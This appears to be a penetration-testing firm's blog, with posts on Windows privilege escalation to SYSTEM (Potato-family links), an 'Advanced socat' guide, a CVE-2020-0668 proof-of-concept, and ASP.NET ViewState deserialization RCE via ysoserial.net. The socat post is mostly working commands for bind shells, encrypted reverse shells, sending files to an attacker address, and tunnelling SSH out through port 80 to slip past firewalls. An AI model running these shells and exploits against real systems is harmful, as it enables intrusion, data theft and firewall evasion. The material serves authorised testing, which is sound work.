The privileges SeAssignPrimaryToken, SeCreateToken, SeDebug, SeLoadDriver, SeRestore, SeTakeOwnership and SeTcb are guaranteed to give you SYSTEM. Other privileges could also be abused in specific scenarios and should be investigated.

https://github.com/gtworek/Priv2Admin/blob/master/README.md

Attack 2:
If you are SYSTEM then regardless of the privileges (even if they have been stripped) you have every privilege:

https://www.tiraniddo.dev/2020/01/dont-use-system-tokens-for-sandboxing.html

Attack 3:
Starting with Windows 10 Microsoft have removed SeImpersonate and SeAssignPrimaryToken privileges from service processes when they are not required. Task Scheduler can be leveraged to regain the lost privileges:

https://itm4n.github.io/localservice-privileges/
https://github.com/itm4n/FullPowers

Attack 4:
Often when performing exploits against software running on Windows you will gain code execution within the context of the Local or Network service accounts.

Up until Windows version 1809 (and Server 2019) you could leverage the SeImpersonate or SeAssignPrimaryToken privileges of the service accounts by abusing NTLM local authentication via reflection. This allowed the impersonation or assignment of the SYSTEM token. The most common variations of this method are HotPotato, RottenPotato, RottenPotatoNG and JuicyPotato. 

JuicyPotato is the most modern and used method. There are several implementations of juicy-potato that use reflective DLL injection or are implemented as a .NET assembly to avoid dropping files to disk.

On Windows version 1809 (and Server 2019) and later, Microsoft “fixed” the reflected NTLM authentication abuse that allowed JuicyPotato to function. This sparked new research into escalating privileges or regaining the lost permissions. I’m going to list the new methods and research that now exist.

#1) https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
https://github.com/antonioCoco/RogueWinRM
https://ethicalchaos.dev/2020/04/13/sweetpotato-local-service-to-system-privesc/
https://github.com/CCob/SweetPotato

#2) https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
https://decoder.cloud/2020/05/04/from-network-service-to-system/
https://github.com/decoder-it/NetworkServiceExploit

#3) https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
https://github.com/itm4n/PrintSpoofer

#4) https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
https://github.com/antonioCoco/RoguePotato

I’ve opted not to go into detail of the methods as all of the write-ups are fantastic and I highly recommend giving them a read. With the number of methods available it would be highly unlikely that the compromise of a service account doesn’t lead to SYSTEM.
0 Comments

Advanced socat

4/22/2020

0 Comments

 

socat is a general-purpose networking tool that allows the creation of two bidirectional streams. It has a large amount of support for different protocols and data sources, including OPENSSL, SOCKS4, TCP, UDP, TAP, SCTP and more. When performing a penetration test this tool can be leveraged to bypass basic firewall restrictions and transfer files across the network.

Statically compiled socat

There is a cool project called static-toolbox which provides statically compiled networking and debugging tools. This project includes a statically compiled versions of socat for x86/x86_64 and allows the tool to have a lot more portability between differing Linux distributions and major library versions for a small cost of ~2MB.

Simple Listening Shell

On the client run:

socat TCP-LISTEN:8080 exec:"bash -i",pty,stderr,setsid,sigint,sane

On the attacker machine run

socat - TCP:$clientip:8080
#or
nc $clientip:8080

This shell works great, but there are two obvious problems:

  • - The IP will be listening for any connection
  • - The firewall might block non-default ports (such as 8080)

We can get around this by using the outbound technique that I will show later.

Simple File Transfer

There are two methods of doing file transfers:

  • - Opening a listening port and waiting for the file
  • - Opening a listening port to send the file

Overall, the better of these two methods is when a client connects to a listening port to download a file, as this is less likely to be blocked by firewalls. To do this you need to run these two commands.

On the attacker:

socat file:secretfile TCP-LISTEN:8080

On the client:

socat TCP:$attackerip:8080 OPEN:/tmp/secretfile,create

Encrypted Listening Shell

We can generate an encrypted reverse shell with client and server keys to allow only our chosen attacker machine to connect to the server.

# Find more detailed steps at:
#   http://www.dest-unreach.org/socat/doc/socat-openssl.txt
openssl genrsa -out server.key 2048
openssl genrsa -out client.key 2048

# IMPORTANT: When generating the server.crt it will 
#   ask for a "commnonName", make sure this is the 
#   same as your attacker's hostname!
openssl req -new -key server.key -x509 -days 3653 -out server.crt
openssl req -new -key client.key -x509 -days 3653 -out client.crt

cat server.key server.crt > server.pem
cat client.key client.crt > client.pem

rm {server,client}.key

chmod 600 server.pem client.pem

#Server.pem is on the host.
#Client.crt is on the host.
#On the host run:
socat OPENSSL-LISTEN:1443,reuseaddr,fork \
                         ,cert=server.pem,cafile=client.crt,verify=1 \
    exec:'bash -i',pty,stderr,setsid,sigint,sane

#Server.crt is on the client
#Client.pem is on the client.
#On the client run:
socat \
    OPENSSL:localhost:1443,verify=1,cert=client.pem,cafile=server.crt -

socat reverse shell

Sometimes the network will be configured in such a way that only certain ports will be able to host a listening service, such as 80 and 443 on a web host for example. In this case, unless we have sudo privileges, establishing a listening shell with socat is not possible. To mitigate this we can instead forward a shell or service through an outbound connection. We can also establish a PTY shell in a similar fashion

On the attacker machine run:

sudo socat -d TCP-LISTEN:80 TCP-LISTEN:-

On the client run:

socat -d exec:"bash -i",pty,stderr,setsid,sigint,sane

Forwarding a service through an outbound connection Sometimes we want to be able to access a local service on the machine, for example if we want to access the SSH service running on our host we need to be able to use the ssh command or to be able to use our browser to interact with a local web server. We can achieve this by instead creating a second listening port on the attacker machine that will allows our different programs to connect and interact with the client's service. On the attacker machine we create two listening ports, it will wait for a connection from our client on port 80 and then wait for a suitable
sudo socat -d TCP-LISTEN:80,fork,reuseaddr TCP-LISTEN:10023

On the client run:

socat -d TCP:localhost:22 TCP::80

This will allow you to connect to the service (In this case SSH) by connecting to local port 10023.

ssh root@localhost -P 10023
#or
curl http://localhost:10023

socat encrypted reverse shell

On the attacker machine we create a listening port, it will wait for a connection from our client on port 80 and then allow us to interact with it from stdin.

sudo socat -d \
    OPENSSL-LISTEN:80,reuseaddr,fork,\
    cert=server.pem,cafile=client.crt,verify=1 -

On the client machine we need to run:

socat exec:"bash -i",pty,stderr,setsid,sigint,sane \
      OPENSSL:localhost:80,verify=1,cert=client.pem,cafile=server.crt

Forwarding a service through an encrypted outbound connection

After following the key generation steps listed in the encrypted reverse shell section we can wrap our outbound reverse shell in openssl using the following commands.

On the attacker machine we need to run:

sudo socat -d \
    OPENSSL-LISTEN:80,reuseaddr,fork,\
    cert=server.pem,cafile=client.crt,verify=1 \
    TCP-LISTEN:10023,reuseaddr,fork

On the client machine we need to run:

socat TCP:localhost:22 \
      OPENSSL:localhost:80,verify=1,cert=client.pem,cafile=server.crt

Finally, we can create a connection by running the final connect command on the attacker machine.

ssh root@localhost -P 10023
#or
curl http://localhost:10023

Forwarding packets through a web proxy with socat

Sometimes a service or program will not allow the user to set a HTTP proxy. For example, if you wanted to inspect the HTTP connections a browser is making but the proxy settings are broken. The command to do so follows the general form:

socat TCP-LISTEN:$lstport \
    PROXY:$proxyip:$dstip:$dstport,proxyport=$proxyport
socat TCP-LISTEN:8000 PROXY:localhost:google.com:80,proxyport=8080

In your browser you would point to http://localhost:8000 and it would be redirected to the end server (http://google.com) through the proxy running on port 8080. This would allow you to set up BurpSuite and use it to inspect packets without having to set proxy configurations in the actual browser. This becomes especially applicable in reversing a programs protocol where it does not allow you to set a proxy.

0 Comments

Making a PoC for CVE-2020-0668

4/2/2020

0 Comments

 
Recently Clément Labro released a blog post about an arbitrary file move vulnerability he discovered. This was CVE-2020-0668 which involved abusing Service Tracing to cause an arbitrary file move with the help of symlinks.

I confirmed the vulnerability using the Google Project Zero symboliclink-testing-tools but wanted to create a standalone executable, that could be easily shipped to a target machine to exploit the CVE. C# seemed like an appropriate language as I could leverage the NtApiDotNet package which had done all the hard work for me.
​

Writing the code was as simple as following the instructions in the blog post and making sure I understand the mount point  and symbolic link trickery. Luckily this has been described by James Forshare in a number of blog posts, and implemented in his API methods NtFile.CreateMountPoint and NtSymbolicLink.Create. The complete proof of concept code can be found on GitHub here.
0 Comments

Exploiting ASP.NET ViewState Misconfigurations for Remote Code Execution

4/1/2020

1 Comment

 
This post explores how an ASP.NET project incorrectly disclosing its web.config containing static keys allows for remote code execution. The common cases for exploiting this vulnerability would be if the web application has published it’s static machine keys to GitHub, such as with the example project for this post (https://github.com/ozajay0207/EGVC) or if the application has a local file inclusion vulnerability that allows the attacker to obtain a copy of the static keys from the web.config file.

In order to keep track of different sessions, ASP.NET applications use a ViewState that contains serialized application defined data. Due to the nature of serialization, if the user can control and create a valid ViewState, then they can use a deserialization attack to achieve remote code execution on the host.

In order to mitigate this potential attack ASP.NET applications can perform HMAC signing of the ViewState to verify the authenticity of the object. Another option is using encryption with a secret key to prevent reading or modification of its contents. Keeping these keys secret is paramount in preventing ViewState deserialization attacks and remote code execution.

These mitigations rely on each application utilising uniquely generated validation and decryption keys, which is not always the case. Recently, CVE-2020-688 exposed Microsoft for including static validation and decryption keys in the Microsoft Exchange Server’s control panel. The same keys were generated once and shared among every exchange installation allowing anyone with a copy of the server to recover and misuse these key values.
To demonstrate this attack, a proof of concept will be performed for a public GitHub project that contained this vulnerability. Figure 1 is the web.config from the chosen project and contains two security issues. Firstly, the validation and decryption key are hard coded and secondly, the ViewState encryption mode has been disabled.
Picture
​A successful attack requires not only the validation key, but also a page on the website that uses a ViewState. In this case the website has a registration page that includes various text entries and controls; a perfect candidate for using ViewState. In the registration page’s source code there are two hidden elements that include the page’s ViewState and ViewState Generator.
Picture
​Now that the three required pieces of information have been recovered, a payload can be generated using ysoserial.net. The malicious payload will execute an arbitrary command, in this case a simple PowerShell web request to a controlled endpoint, is used so that the code execution can be verified.
Picture
The tool ysoserial.net creates a payload that is base64 encoded but supplying this directly to the server in a request will cause parsing errors. This occurs because the base64 standard includes some symbols, such as the equals sign, that will be misinterpreted in a HTTP request. To remedy this the payload must be URL encoded. With this encoding the necessary symbols will be correctly interpreted by the ASP application.
​
To perform the attack the default packet HTTP POST from the registration form was captured into BurpSuite, and the __VIEWSTATE variable was replaced with the malicious ViewState generated by ysoserial.net. Once the request is sent to the server the PowerShell command is executed, and a corresponding GET request is made to our controlled endpoint.
Picture
​From here it is straightforward for an attacker to modify the command to download and execute a malicious PowerShell script and create a reverse shell.
1 Comment

    Author

    Red Cursor

    Archives

    May 2020
    April 2020

    Categories

    All

    RSS Feed

Services

Incident Response and Forensics
Penetration Testing and Ethical Hacking
Specialist Security Consulting
Managed Security Services

COMPANY

About Red Cursor
Contact Us

© COPYRIGHT 2018. ALL RIGHTS RESERVED.
  • Home
  • Services
  • About
  • Contact
  • Blog